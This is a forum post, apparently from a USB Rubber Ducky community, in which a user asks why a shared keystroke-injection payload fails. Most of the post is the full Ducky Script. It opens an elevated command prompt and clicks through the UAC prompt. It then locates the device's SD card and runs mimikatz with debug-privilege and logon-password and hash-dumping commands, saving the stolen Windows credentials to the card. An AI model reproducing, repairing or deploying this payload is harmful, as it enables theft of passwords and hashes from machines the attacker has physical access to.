So noob question here. I can't seem to get mimikatz to run after insertion. I have copied Darren's code from above, but for some reason it exits prior to executing the .exe file. I modified his a bit, maybe someone can look at this.
REM Author: Hak5Darren. Props: shutin, DyFukA, Mubix
REM Description: Dump local wdigest passwords from memory using mimikatz
REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mikikatz from
REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt
REM Target: Windows 7 x86
REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500
REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 1000
REM *** Execute mimikatz from SD card and save log file to disk ***
STRING %duck%\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt
ENTER
REM *** GTFO ***
STRING exit
ENTER
STRING exit
ENTER
I changed the %duck%mimikatz_alpha_x64.exe to just be mimikatz.exe
That should work right? I copied the alpha/win32/mimikatz.exe over but it still doesn't seem to run. It seems simply skip over this and exit. Any ideas?
No one wants to help me out here? I can't seem to get this to work. The other problem that I have, well part of this problem, is that the mimikatz application is not named as it is listed here in the ducky code. It is simply named mimikatz.exe. I know to take the program from the right folder, but I seem to be at a stand still. Anyone out there that can help with this payload?